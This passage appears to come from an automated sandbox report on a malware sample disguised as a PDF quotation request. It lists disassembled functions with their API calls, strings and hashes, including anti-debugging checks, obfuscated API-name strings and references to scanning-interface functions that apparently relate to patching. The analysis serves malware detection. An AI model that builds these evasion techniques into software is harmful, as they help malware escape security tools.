                                                                  • VariantCopy.OLEAUT32(?,00000000), ref: 0295E6CD
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                  • String ID:
                                                                  • API String ID: 351091851-0
                                                                  • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                  • Instruction ID: 973fa51c890c1a9815d63288a4b52f9f24c2f3d0067b0a05c2c4d4273f9734d4
                                                                  • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                  • Instruction Fuzzy Hash: 3451D675A0162D9BDB26EF58C880BD9B7FDAF8C340F4041E5E949A7201DB31AF858F61
                                                                  Function 02953568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0295358A
                                                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029535D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029535BD
                                                                  • RegCloseKey.ADVAPI32(?,029535E0,00000000,?,00000004,00000000,029535D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029535D3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                  • API String ID: 3677997916-4173385793
                                                                  • Opcode ID: a3c5098fb5d7a38ccdcbeaff9c41f2dab4e7da6d03627a135ff475358a96420d
                                                                  • Instruction ID: 13f942964c85298b455e68f0accd13a0dccf5247adfa48cf53376c6fd703ce04
                                                                  • Opcode Fuzzy Hash: a3c5098fb5d7a38ccdcbeaff9c41f2dab4e7da6d03627a135ff475358a96420d
                                                                  • Instruction Fuzzy Hash: 9B01B175B44228BAEB11DB908D02BBD77ECDB49B50F1005A6BE04D6580E774AA11DB68
                                                                  Function 029680C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                  • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                  • GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: Kernel32$sserddAcorPteG
                                                                  • API String ID: 667068680-1372893251
                                                                  • Opcode ID: fdce0203ed7ace238a491fcf57c4c913a544015bdf5327564c5ee15b895b915b
                                                                  • Instruction ID: cfb24d56d24de729b1a3d2bdf520bad99760c2d35d19143565b1949fc4812d30
                                                                  • Opcode Fuzzy Hash: fdce0203ed7ace238a491fcf57c4c913a544015bdf5327564c5ee15b895b915b
                                                                  • Instruction Fuzzy Hash: 9F01A274B44304AFEB01EFA4D955EAE77FEFBC9700F924864B804D7640E630A9008B24
                                                                  Function 0295A9D8 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(?,00000000,0295AA6F,?,?,00000000), ref: 0295A9F0
                                                                    • Part of subcall function 0295A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0295A76A
                                                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0295AA6F,?,?,00000000), ref: 0295AA20
                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000A924,00000000,00000000,00000004), ref: 0295AA2B
                                                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0295AA6F,?,?,00000000), ref: 0295AA49
                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000A960,00000000,00000000,00000003), ref: 0295AA54
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread$CalendarEnum
                                                                  • String ID:
                                                                  • API String ID: 4102113445-0
                                                                  • Opcode ID: bdf658768c2f8df9dbabf05efddf967e4e8b9e01dd7de3b434ffbb574d71c7c1
                                                                  • Instruction ID: b095c6e316830034e7deb15f732fc7e5965818fd3d1af0755bb67a00a7f362ab
                                                                  • Opcode Fuzzy Hash: bdf658768c2f8df9dbabf05efddf967e4e8b9e01dd7de3b434ffbb574d71c7c1
                                                                  • Instruction Fuzzy Hash: 8701F2307402746FF742E6B4CD12B6E739EDBC6720FD10660FE01A66C0D6249E008BA8
                                                                  Function 0295AA88 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(?,00000000,0295AC58,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0295AAB7
                                                                    • Part of subcall function 0295A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0295A76A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread
                                                                  • String ID: eeee$ggg$yyyy
                                                                  • API String ID: 4232894706-1253427255
                                                                  • Opcode ID: a7c833c6ab0f19b57ed7f26aa014820294689a7b6f51d3b7f9475d03674fe26e
                                                                  • Instruction ID: 2c3505b9c14ff13177ee6a9ad86f1c83bd571ca4cfdf5b4549381e4586d57f7a
                                                                  • Opcode Fuzzy Hash: a7c833c6ab0f19b57ed7f26aa014820294689a7b6f51d3b7f9475d03674fe26e
                                                                  • Instruction Fuzzy Hash: 5041E2747046354BD711EF69C8802BEB2EBEFC5200B545B2AEC62C7344D624D9458B69
                                                                  Function 02968020 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02968090,?,?,00000000,?,02967A06,ntdll,00000000,00000000,02967A4B,?,?,00000000), ref: 0296805E
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                  • GetModuleHandleA.KERNELBASE(?), ref: 02968072
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc
                                                                  • String ID: AeldnaHeludoMteG$KernelBASE
                                                                  • API String ID: 1883125708-1952140341
                                                                  • Opcode ID: f39e55eb9e553eae359159f82b50fccd0044e77fff94cd2a6875457e24e13d0c
                                                                  • Instruction ID: 92db5e7c1e3613a4b2b0ed1389fb128b39cf8f895274e42454d0726db32a819e
                                                                  • Opcode Fuzzy Hash: f39e55eb9e553eae359159f82b50fccd0044e77fff94cd2a6875457e24e13d0c
                                                                  • Instruction Fuzzy Hash: 95F06230748304AFEB01EFA4D9559BE77EDFB89700B910D60F80493A00E630AD148A64
                                                                  Function 0296EB94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(KernelBase,?,0296EF98,UacInitialize,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,ScanBuffer,029B137C,0297AFD8,ScanString,029B137C,0297AFD8,Initialize), ref: 0296EB9A
                                                                  • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0296EBAC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: IsDebuggerPresent$KernelBase
                                                                  • API String ID: 1646373207-2367923768
                                                                  • Opcode ID: ab17ca9faac66d9be97ecfea72e31e3ec5a41e3d58753a93c9e0351df4b221eb
                                                                  • Instruction ID: 91261a2794b7931e4bc1103d9e3c4a6fa418b3ece8e2d071a4881c5a998c608c
                                                                  • Opcode Fuzzy Hash: ab17ca9faac66d9be97ecfea72e31e3ec5a41e3d58753a93c9e0351df4b221eb
                                                                  • Instruction Fuzzy Hash: 5ED0806A7567251DF500B5F51CCCC3E02CD85C553E3600F79F463D60D2E666C8121610
                                                                  Function 0295C3FC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0297C10B,00000000,0297C11E), ref: 0295C402
                                                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0295C413
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                  • API String ID: 1646373207-3712701948
                                                                  • Opcode ID: 2959a5228680e049cf7794aed9c7af2cb1bbf2f34db2405abfc3f5167bf41647
                                                                  • Instruction ID: dbc03e01eb2c7a18f861f7e536202949875a67f755bd77f95f727e97d41bb685
                                                                  • Opcode Fuzzy Hash: 2959a5228680e049cf7794aed9c7af2cb1bbf2f34db2405abfc3f5167bf41647
                                                                  • Instruction Fuzzy Hash: 4BD0C7A1B463315EF700DFB568C0E7636DCDB85B09F805836EC0955141D77554588FA4
                                                                  Function 0295E170 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0295E21F
                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0295E23B
                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0295E2B2
                                                                  • VariantClear.OLEAUT32(?), ref: 0295E2DB
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                  • String ID:
                                                                  • API String ID: 920484758-0
                                                                  • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                  • Instruction ID: 5498a9ee87043218917ef4cf245f605fca283c963b29ffa9f6e90cdb6b69b635
                                                                  • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                  • Instruction Fuzzy Hash: 6D410C75B0062D9FCB65DB58CC90BD9B7BDAF88304F0041E5EA49E7251DA31AF808F61
                                                                  Function 0295ACC4 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0295ACE1
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0295AD05
                                                                  • GetModuleFileNameA.KERNEL32(02950000,?,00000105), ref: 0295AD20
                                                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0295ADB6
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                  • String ID:
                                                                  • API String ID: 3990497365-0
                                                                  • Opcode ID: 1147e45abeeeeda11d6d46c80ad1919919efe11a5b41d297225db1090176a5a9
                                                                  • Instruction ID: b6043f30404d6e2ed21ee58db11ce94eb95c377b6afd3dc6c481d4fc2f7d49ec
                                                                  • Opcode Fuzzy Hash: 1147e45abeeeeda11d6d46c80ad1919919efe11a5b41d297225db1090176a5a9
                                                                  • Instruction Fuzzy Hash: 55412C70B002689BDB61EB68CC84BDAB7FDAF48300F4045E6AA48E7251DB759F84CF54
                                                                  Function 0295ACC2 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0295ACE1
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0295AD05
                                                                  • GetModuleFileNameA.KERNEL32(02950000,?,00000105), ref: 0295AD20
                                                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0295ADB6
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                  • String ID:
                                                                  • API String ID: 3990497365-0
                                                                  • Opcode ID: 48af0c44f8ecbfd0fd0c917d68947706e13d6a2efec892032b3d4a69eb400b4a
                                                                  • Instruction ID: 2de2a95efcd8a985929f33a0de7bf79e5cc006befe57cd49ac63155ac72c6f05
                                                                  • Opcode Fuzzy Hash: 48af0c44f8ecbfd0fd0c917d68947706e13d6a2efec892032b3d4a69eb400b4a
                                                                  • Instruction Fuzzy Hash: CD413A70B002689BDB61EB68CC84BDAB7FDAF48300F4041E5AA48E7251DB759F88CF54
                                                                  Function 02951C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 12e54c2e459c6e44b6bc5a48e3514c02d17b7c474ac1d812e8e6a81076458575
                                                                  • Instruction ID: f09637e0f4414ce7135852f9db9a6230ae64640c7be56490371931a5ab042733
                                                                  • Opcode Fuzzy Hash: 12e54c2e459c6e44b6bc5a48e3514c02d17b7c474ac1d812e8e6a81076458575
                                                                  • Instruction Fuzzy Hash: 15A1E5667106200BE718EA7C9C843BDB3C6DFC4225F18467EED1DCB391EB68C9468790
                                                                  Function 02959474 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02959562), ref: 029594FA
                                                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02959562), ref: 02959500
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: DateFormatLocaleThread
                                                                  • String ID: yyyy
                                                                  • API String ID: 3303714858-3145165042
                                                                  • Opcode ID: 5a5b76f7c7397bef40285cddf3fb583d3487cd0239d5076f93b99caad50bef22
                                                                  • Instruction ID: 17c07325cfc78e29a9ba3fb11c6261ab5abaff5c0f0a01f7083058251cf100f9
                                                                  • Opcode Fuzzy Hash: 5a5b76f7c7397bef40285cddf3fb583d3487cd0239d5076f93b99caad50bef22
                                                                  • Instruction Fuzzy Hash: 1B218D75B04238DFEB51DFA8C881AAEB3F9EF88710F5100A5ED09E7240D6309E51CBA1
                                                                  Function 0296818C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02968090,?,?,00000000,?,02967A06,ntdll,00000000,00000000,02967A4B,?,?,00000000), ref: 0296805E
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNELBASE(?), ref: 02968072
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                  • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02968216), ref: 029681F8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                  • String ID: FlushInstructionCache$Kernel32
                                                                  • API String ID: 3811539418-184458249
                                                                  • Opcode ID: 90af2a94f5e8cbce37e0ebea2978ea17b220c1581b6a8d94964cf8aa3a16d133
